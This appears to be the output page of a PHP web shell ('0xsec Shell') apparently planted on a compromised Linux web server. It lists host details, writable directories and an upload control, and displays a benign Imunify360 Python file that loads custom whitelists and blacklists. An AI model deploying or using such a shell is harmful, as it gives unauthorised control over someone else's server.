0xsec Shell
0xSec


Server : LiteSpeed
System : Linux webbox1.ncrdns.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : rahcos ( 1533)
PHP Version : 8.4.23
Disable Function : NONE
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/im360/model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/imunify360/venv/lib/python3.11/site-packages/im360/model/custom_lists.py
import glob
import logging
from typing import List

from im360.model.global_whitelist import GlobalWhitelist

CUSTOM_WHITELIST_MASK = "/etc/imunify360/whitelist/*.txt"
CUSTOM_BLACKLIST_MASK = "/etc/imunify360/blacklist/*.txt"

logger = logging.getLogger(__name__)


class CustomWhitelist(GlobalWhitelist):
    _LIST_PATH = CUSTOM_WHITELIST_MASK

    @classmethod
    async def load(cls, group=None) -> List[str]:
        result = []  # type: List[str]

        for f in glob.glob(cls._LIST_PATH):
            logger.info("Loading %s to %s", f, cls.__name__)
            result.extend(cls._load_file(f, log_error=logger.warning))

        return result


class CustomBlacklist(CustomWhitelist):
    _LIST_PATH = CUSTOM_BLACKLIST_MASK

c0oded By c0rpz